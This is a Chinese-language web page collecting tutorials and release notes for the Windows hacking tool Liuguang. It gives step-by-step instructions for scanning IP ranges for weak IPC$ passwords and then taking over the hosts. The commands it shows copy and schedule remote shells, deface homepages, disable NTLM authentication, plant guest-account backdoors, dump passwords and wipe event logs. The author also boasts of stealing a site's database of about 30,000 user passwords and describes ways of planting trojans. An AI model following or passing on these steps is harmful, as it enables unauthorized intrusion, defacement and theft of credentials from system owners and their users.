流光黑客使用教程图解_流光黑客使用教程

hacker|
367

流光怎么用?

流光使用教程一

流光教程二

流光教程三

流光教程终结篇

"其实还远远没有结束

互联网的存在是没有结束的

提前写这个终结,是因为我怕以后没有时间来写。

新版的流光教程还会继续下去

我想你已经不需要了,就算是对流光help文档一个注释吧。

记住我说过的话:我以流光谈起,你泛开去想、去做。

其实对于你而言,一切才刚刚开始……"

什么是流光,有什么用,怎么用,详细有用的答案,加分

流光的IPC探测:

一、目的和任务:

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/ *** 。

2、学习IPC探测的相关知识。

二、探测流程:

1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

什么是IPC:

IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程 *** 登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。

注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

2、首次启动流光,会看到注册的画面,具体操作请参考本人之一篇教程。我们在主页面上可以有几种 *** 来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令,本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||

7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的:(,我们更好是物有所有,作成跳板吧,今后干活方便点:

执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

9、还能做成其他的么 ?

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)

10、日志清除,断开连接 :

执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete

黑客工具--流光?

【流光 2001 For NT/2000】

SQL Server扫描:速度是Sqldict的7倍。

测试一:255台主机的网段,SQL 40台,5分钟内成功得到18个SA。

测试二:255台主机的网段,SQL 38台,5分钟内成功得到12个SA。

【流影 Http Edition Beta 2】情况

流影Http Edtion Beta2的改进:

1、提高了探测速度,在我养的鸡上面,每分钟可以扫描2500次,也就是说一天可以扫描3,600,000次,大约是前版速度的5倍。

2、可以作为NT的一个Service登陆。就是可以直接用netsvc启动。

3、控制的方便性。进行修改、删除当前命令行,并且可以重复输入上一次的命令。此外登陆时密码也不再是明文显示了。

目前还需要在NT4中做一些测试,不久即可提供下载。

【流光2000 Preview 3 For NT/2000】升级

流光2000 Preview 3发布,需要先下载Preview 2 For NT/2000。修正BUG:

1、在Import时选择取消时出错的问题。

2、修正HTTP/Proxy时误报的问题。目前有一部分网站在多次探测失败时会禁止当前IP的登陆,对于目前这个问题没有太好的解决 *** ,唯一可以解决 *** 是采用一个Proxy列表自动切换。目前我没有太多的Proxy,如果您有请发给给我一份,以便我能调试。

其他:

今天突然想看看国内用户一般采用的密码是什么,于是随便挑了一个网站,经过一系列步骤登陆进去,将其用户注册数据库下载了。大约有87M(晕倒,还好是DDN上网用了大约10分钟就下载完了),有将近30000个用户和密码。于是做了一个简单的统计,使用密码最多的是0000、00000、000000、0000000、00000000、aaaa、1111.......等,其余密码85%都使用数字。我将密码整理了一遍,又需要的可以下载。

【光和影子】-流光/流影实例说明

光和影子

【流影 POP3 Edtion】发布

【流影 HTTP Edtion】发布

【流影 POP3 Edtion】使用说明

使用说明

【流影 POP3 Edtion】开发顺利

目前开发顺利,不久即可提供下载。

【流光2000】 Preview 2 (中/英文版) For Windows 98 发布

由于很多用户没有安装NT/2000,所以特别定制了一个能在98下面运行的版本,但是此版本没有IPC(Inter Process Communication)功能。

【流光2000】Preview 2 (中/英文版)For Windows NT/2000 发布

包括几个工具(在Tools目录中)以及一个关于利用2000作为跳板的说明。

【溯雪Beta7】For Windows 98/NT/2000发布

支持任意大字典,支持需要身份认证的Proxy,不再会出现假死机。

【论坛更换】

由于最近总有人在我的论坛上面捣乱,所以决定更换论坛。

【流光2000】Preview 2 中英文版将同时发布

【RunAsEx】For Windows NT 3.51/4.0/2000

用途:在Windows NT中以指定用户身份创建进程。

当我们用Srv.exe(NetCat)登录之后,发现有很多程序无法运行,例如:pwdump,尽管这个时候已经具有了Administrator的密码。

用AT命令创建的进程,Windows NT是以系统帐号的身份运行的,而不是创建者的帐号。系统帐号的权限是有限的,例如不能启动和 *** 相关的程序。

Windows 2000中提供了一个RunAs程序就是实现这个功能的,但是如果用Srv.exe登陆,由于无法更改回显模式而无法使用。除非使用Telnet登陆。NT4.0没有Telnet服务,所以即使将RunAs复制到NT4.0中,也会因为前面说的原因无法使用。所以特地写了一个小工具RunAsEx。

RunAsEx可以适用于NT4.0/2000,可以在Srv.exe登陆的连接中使用。

RunAsEx UserName Password Execute File ["Execute Option"]

UserName 运行创建程序的用户名称

Password 创建程序的用户密码,如果密码为空,以*号代替。

Execute File 可执行文件名,必须为全路径,带后缀。

["Execute Option"] 可执行文件的命令行选项,如果无需选项,此项可以不填。选项必须以"开始和结束。

例如:

RunAsEx Administrator password \winnt\pwdump.exe "pwd.txt"

RunAsEx Administrator password \winnt\system32\net.exe "user Hakcer /add"

注意:此工具不能在本地运行

可在【小榕作品】中下载。

【流光 2000】For Windows 2000/NT Preview 2 Update

修正Socket超时及线程同步问题,线程可以更加稳定运行。

【流光 2000】For Windows 2000/NT 4.0 Preview 1 Announced

可以在Windows 2000及Windows NT 4.0中运行,但是没有在NT4.0中做过测试。

不能运行于Windows 9.x。

可以运行于局域网,但是IPC$探测功能对国内IP保留。

建议不要强制退出,否则会导致内存泄漏(Memory Leak)。

【流光 2000】将会发布一个英文版。

【溯雪】Beta 7稍后发布。

一年前的今天,【流光1.0】问世,在随后一年的时间里又经历了1.1、1.12、1.13、1.25、1.27、2.0、2.5、2.5SE、3.0等版本,代码由7,000行发展到76,000行,目前用户数将近400,000。开发正因为有了这么多朋友的支持,我才得以坚持做下去。在此,小榕深表感谢!

请到【小榕作品】下载。

------------------

用许多的时间去后悔,不如再开始新的努力!

我是一只大大大鸵鸟,想要飞也飞也飞不高!

流光的使用

流光是功能很强大的安全软件,但是也很复杂,在这上一点一点打字根本说不明白。你要是去网上搜流光教程,基本上没有全的,有全的相信你也看不下去,,,我先跟你说一下过程吧,(当然不一定要用流光,其他的软件也可以达到目的,而且很多软件很简单,看你用什么顺手了!)攻击有很多方式,首先是扫描对方端口,通过看他开了哪些端口就知道他运行了什么服务,扫描器有x-scan,superscan等,很多,如果通过扫描看到他80,8080端口开了,就说明他有http服务,也就是有网站。当然这并不一定,有的网站是改了端口的,你扫描不到80;如果开了3389 ,就是开了远程连接,你可以通过附件里的远程桌面连接连上他,(不过要是不知道密码,或者技术不够的的话连上也没什么用)。其实这一步挑战才刚刚开始,就是怎么破解他的密码,这要综合运用电脑技术,社会工程学等的内容。至于怎么拿到shell,只就是看你的技术了,笨人有笨的 *** ,比如说暴力破解,就是用穷举法一个一个的猜,不到万不得已,没人会用这种 *** ;还有用字典的,就是流光里的那个用户帐户,你右键点他,就有用户帐户和密码,可以加字典破解的,不过解出来的概率也不太高。

再有就是用木马攻击的,木马是一个小程序,他的作用是偷偷地给你开一个端口,以便于对方控制你的电脑,跟3389远程连接类似,不过他不用猜你的帐户和密码。

种植木马也是很多 *** ,可以在某个网站挂马,这样访问过他的人而且电脑没装杀毒软件的很容易就中招了;或者通过u盘自动运行;或者通过qq,电子邮件传播,甚至你下某个软件都有可能中木马。

太具体的我就不说了,如果你很想了解这方面的内容建议你常去一些著名的黑客红客网站,我就不告诉你网址了以免有做广告的嫌疑!自己去搜吧!呵呵

0条大神的评论

发表评论